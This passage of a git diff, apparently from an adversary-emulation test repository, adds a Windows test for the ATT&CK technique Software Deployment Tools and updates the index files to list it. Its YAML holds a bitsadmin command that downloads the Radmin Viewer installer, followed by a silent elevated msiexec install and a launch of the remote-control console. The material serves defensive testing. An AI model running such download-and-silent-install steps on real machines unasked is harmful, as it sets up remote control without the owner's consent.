Management,2,Invoke-Command,5295bd61-bd7e-4744-9d52-85962a4cf2d6,powershell lateral-movement,T1021.006,Windows Remote Management,3,WinRM Access with Evil-WinRM,efe86d95-44c4-4509-ae42-7bfd9d1f5b3d,powershell diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 8faf5fae..a91df23f 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -575,6 +575,7 @@ execution,T1053.005,Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8 execution,T1053.005,Scheduled Task,6,WMI Invoke-CimMethod Scheduled Task,e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b,powershell execution,T1569.002,Service Execution,1,Execute a Command as a Service,2382dee2-a75f-49aa-9378-f52df6ed3fb1,command_prompt execution,T1569.002,Service Execution,2,Use PsExec to execute a command on a remote host,873106b7-cfed-454b-8680-fa9f6400431c,command_prompt +execution,T1072,Software Deployment Tools,1,Radmin Viewer Utility,b4988cad-6ed2-434d-ace5-ea2670782129,command_prompt execution,T1059.005,Visual Basic,1,Visual Basic script execution to gather local computer information,1620de42-160a-4fe5-bbaf-d3fef0181ce9,powershell execution,T1059.005,Visual Basic,2,Encoded VBS code execution,e8209d5f-e42d-45e6-9c2f-633ac4f1eefa,powershell execution,T1059.005,Visual Basic,3,Extract Memory via VBA,8faff437-a114-4547-9a60-749652a03df6,powershell @@ -603,6 +604,7 @@ lateral-movement,T1021.002,SMB/Windows Admin Shares,1,Map admin share,3386975b-3 lateral-movement,T1021.002,SMB/Windows Admin Shares,2,Map Admin Share PowerShell,514e9cd7-9207-4882-98b1-c8f791bae3c5,powershell lateral-movement,T1021.002,SMB/Windows Admin Shares,3,Copy and Execute File with PsExec,0eb03d41-79e4-4393-8e57-6344856be1cf,command_prompt lateral-movement,T1021.002,SMB/Windows Admin Shares,4,Execute command writing output to local Admin Share,d41aaab5-bdfe-431d-a3d5-c29e9136ff46,command_prompt +lateral-movement,T1072,Software Deployment Tools,1,Radmin Viewer Utility,b4988cad-6ed2-434d-ace5-ea2670782129,command_prompt lateral-movement,T1021.006,Windows Remote Management,1,Enable Windows Remote Management,9059e8de-3d7d-4954-a322-46161880b9cf,powershell lateral-movement,T1021.006,Windows Remote Management,2,Invoke-Command,5295bd61-bd7e-4744-9d52-85962a4cf2d6,powershell lateral-movement,T1021.006,Windows Remote Management,3,WinRM Access with Evil-WinRM,efe86d95-44c4-4509-ae42-7bfd9d1f5b3d,powershell diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 376d32e7..19dec5dc 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -1444,7 +1444,8 @@ - Atomic Test #1: Execute a Command as a Service [windows] - Atomic Test #2: Use PsExec to execute a command on a remote host [windows] - T1129 Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1072 Software Deployment Tools](../../T1072/T1072.md) + - Atomic Test #1: Radmin Viewer Utility [windows] - T1153 Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1569 System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1053.006 Systemd Timers](../../T1053.006/T1053.006.md) @@ -1499,7 +1500,8 @@ - T1021.004 SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1563.001 SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1051 Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1072 Software Deployment Tools](../../T1072/T1072.md) + - Atomic Test #1: Radmin Viewer Utility [windows] - T1080 Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1021.005 VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 66cd7ded..ffb97ef0 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -1049,7 +1049,8 @@ - Atomic Test #1: Execute a Command as a Service [windows] - Atomic Test #2: Use PsExec to execute a command on a remote host [windows] - T1129 Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1072 Software Deployment Tools](../../T1072/T1072.md) + - Atomic Test #1: Radmin Viewer Utility [windows] - T1569 System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1204 User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1059.005 Visual Basic](../../T1059.005/T1059.005.md) @@ -1116,7 +1117,8 @@ - Atomic Test #3: Copy and Execute File with PsExec [windows] - Atomic Test #4: Execute command writing output to local Admin Share [windows] - T1051 Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1072 Software Deployment Tools](../../T1072/T1072.md) + - Atomic Test #1: Radmin Viewer Utility [windows] - T1080 Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1021.005 VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/Matrices/matrix.md b/atomics/Indexes/Matrices/matrix.md index f910d1e7..d6aa3ef7 100644 --- a/atomics/Indexes/Matrices/matrix.md +++ b/atomics/Indexes/Matrices/matrix.md @@ -18,7 +18,7 @@ | Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DCSync](../../T1003.006/T1003.006.md) | Internet Connection Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System Recovery](../../T1490/T1490.md) | | Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchctl](../../T1569.001/T1569.001.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Change Default File Association](../../T1546.001/T1546.001.md) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Account](../../T1087.001/T1087.001.md) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Traffic Duplication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Internal Defacement](../../T1491.001/T1491.001.md) | | Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchd](../../T1053.004/T1053.004.md) | [Browser Extensions](../../T1176/T1176.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Code Signing Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Groups](../../T1069.001/T1069.001.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Malicious File](../../T1204.002/T1204.002.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Compile After Delivery](../../T1027.004/T1027.004.md) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Malicious File](../../T1204.002/T1204.002.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Compile After Delivery](../../T1027.004/T1027.004.md) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | [Software Deployment Tools](../../T1072/T1072.md) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Change Default File Association](../../T1546.001/T1546.001.md) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [Compiled HTML File](../../T1218.001/T1218.001.md) | Forge Web Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](../../T1135/T1135.md) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Network Sniffing](../../T1040/T1040.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) | | | [Native API](../../T1106/T1106.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Control Panel](../../T1218.002/T1218.002.md) | [Golden Ticket](../../T1558.001/T1558.001.md) | [Password Policy Discovery](../../T1201/T1201.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | @@ -30,7 +30,7 @@ | | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | [Service Execution](../../T1569.002/T1569.002.md) | [Cron](../../T1053.003/T1053.003.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Delete Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [LSA Secrets](../../T1003.004/T1003.004.md) | [Software Discovery](../../T1518/T1518.md) | | Network Device Configuration Dump [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Standard Port](../../T1571/T1571.md) | | | | Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | [LSASS Memory](../../T1003.001/T1003.001.md) | [System Checks](../../T1497.001/T1497.001.md) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | [Deploy Container](../../T1610/T1610.md) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) | | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | [Software Deployment Tools](../../T1072/T1072.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | [Deploy Container](../../T1610/T1610.md) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) | | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | [Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | [Direct Volume Access](../../T1006/T1006.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | System Location Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Account](../../T1136.002/T1136.002.md) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disable Cloud Logs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [NTDS](../../T1003.003/T1003.003.md) | [System Network Configuration Discovery](../../T1016/T1016.md) | | [Screen Capture](../../T1113/T1113.md) | | Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | [Systemd Timers](../../T1053.006/T1053.006.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Emond](../../T1546.014/T1546.014.md) | Disable Crypto Hardware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Device Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Connections Discovery](../../T1049/T1049.md) | | Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | diff --git a/atomics/Indexes/Matrices/windows-matrix.md b/atomics/Indexes/Matrices/windows-matrix.md index ee76ea53..44c424f0 100644 --- a/atomics/Indexes/Matrices/windows-matrix.md +++ b/atomics/Indexes/Matrices/windows-matrix.md @@ -15,12 +15,12 @@ | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Native API](../../T1106/T1106.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Spearphishing Attachment](../../T1566.001/T1566.001.md) | [PowerShell](../../T1059.001/T1059.001.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | Code Signing Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](../../T1135/T1135.md) | [SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](../../T1176/T1176.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Compile After Delivery](../../T1027.004/T1027.004.md) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Encrypted Channel](../../T1573/T1573.md) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Change Default File Association](../../T1546.001/T1546.001.md) | [Compiled HTML File](../../T1218.001/T1218.001.md) | Forge Web Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System Recovery](../../T1490/T1490.md) | +| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Change Default File Association](../../T1546.001/T1546.001.md) | [Compiled HTML File](../../T1218.001/T1218.001.md) | Forge Web Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | [Software Deployment Tools](../../T1072/T1072.md) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System Recovery](../../T1490/T1490.md) | | Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Change Default File Association](../../T1546.001/T1546.001.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Peripheral Device Discovery](../../T1120/T1120.md) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Internal Defacement](../../T1491.001/T1491.001.md) | | Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Control Panel](../../T1218.002/T1218.002.md) | [Golden Ticket](../../T1558.001/T1558.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Execution](../../T1569.002/T1569.002.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Group Policy Preferences](../../T1552.006/T1552.006.md) | [Process Discovery](../../T1057/T1057.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Query Registry](../../T1012/T1012.md) | [Windows Remote Management](../../T1021.006/T1021.006.md) | [Keylogging](../../T1056.001/T1056.001.md) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Kerberoasting](../../T1558.003/T1558.003.md) | [Remote System Discovery](../../T1018/T1018.md) | | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Internal Proxy](../../T1090.001/T1090.001.md) | Resource Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | [Software Deployment Tools](../../T1072/T1072.md) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Kerberoasting](../../T1558.003/T1558.003.md) | [Remote System Discovery](../../T1018/T1018.md) | | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Internal Proxy](../../T1090.001/T1090.001.md) | Resource Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | [Default Accounts](../../T1078.001/T1078.001.md) | [Keylogging](../../T1056.001/T1056.001.md) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Software Discovery](../../T1518/T1518.md) | | [Local Email Collection](../../T1114.001/T1114.001.md) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | [Visual Basic](../../T1059.005/T1059.005.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Direct Volume Access](../../T1006/T1006.md) | [LSA Secrets](../../T1003.004/T1003.004.md) | [System Checks](../../T1497.001/T1497.001.md) | | Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Stop](../../T1489/T1489.md) | diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index cf4dc78e..50f26155 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -60499,7 +60499,41 @@ execution: x_mitre_remote_support: true x_mitre_contributors: - Shane Tully, @securitygypsy - atomic_tests: [] + identifier: T1072 + atomic_tests: + - name: Radmin Viewer Utility + auto_generated_guid: b4988cad-6ed2-434d-ace5-ea2670782129 + description: 'An adversary may use Radmin Viewer Utility to remotely control + Windows device, this will start the radmin console. + +' + supported_platforms: + - windows + input_arguments: + radmin_installer: + description: Radmin Viewer installer + type: Path + default: "%TEMP%\\RadminViewer.msi" + radmin_exe: + description: The radmin.exe executable from RadminViewer.msi + type: Path + default: "%PROGRAMFILES(x86)%/Radmin Viewer 3/Radmin.exe" + dependencies: + - description: 'Radmin Viewer Utility must be installed at specified location + (#{radmin_exe}) + +' + prereq_command: 'if not exist "#{radmin_exe}" (exit /b 1) + +' + get_prereq_command: | + echo Downloading radmin installer + bitsadmin /transfer myDownloadJob /download /priority normal "https://www.radmin.com/download/Radmin_Viewer_3.5.2.1_EN.msi" #{radmin_installer} + msiexec /i "#{radmin_installer}" /qn + executor: + name: command_prompt + elevation_required: true + command: '"#{radmin_exe}"' T1153: technique: id: attack-pattern--45d84c8b-c1e2-474d-a14d-69b5de0a2bc0 @@ -62853,7 +62887,41 @@ lateral-movement: x_mitre_remote_support: true x_mitre_contributors: - Shane Tully, @securitygypsy - atomic_tests: [] + identifier: T1072 + atomic_tests: + - name: Radmin Viewer Utility + auto_generated_guid: b4988cad-6ed2-434d-ace5-ea2670782129 + description: 'An adversary may use Radmin Viewer Utility to remotely control + Windows device, this will start the radmin console. + +' + supported_platforms: + - windows + input_arguments: + radmin_installer: + description: Radmin Viewer installer + type: Path + default: "%TEMP%\\RadminViewer.msi" + radmin_exe: + description: The radmin.exe executable from RadminViewer.msi + type: Path + default: "%PROGRAMFILES(x86)%/Radmin Viewer 3/Radmin.exe" + dependencies: + - description: 'Radmin Viewer Utility must be installed at specified location + (#{radmin_exe}) + +' + prereq_command: 'if not exist "#{radmin_exe}" (exit /b 1) + +' + get_prereq_command: | + echo Downloading radmin installer + bitsadmin /transfer myDownloadJob /download /priority normal "https://www.radmin.com/download/Radmin_Viewer_3.5.2.1_EN.msi" #{radmin_installer} + msiexec /i "#{radmin_installer}" /qn + executor: + name: command_prompt + elevation_required: true + command: '"#{radmin_exe}"' T1080: technique: id: attack-pattern--246fd3c7-f5e3-466d-8787-4c13d9e3b61c diff --git a/atomics/T1072/T1072.md b/atomics/T1072/T1072.md new file mode 100644 index 00000000..346ab27a --- /dev/null +++ b/atomics/T1072/T1072.md @@ -0,0 +1,57 @@ +# T1072 - Software Deployment Tools +## [Description from ATT&CK](https://attack.mitre.org/techniques/T1072) +

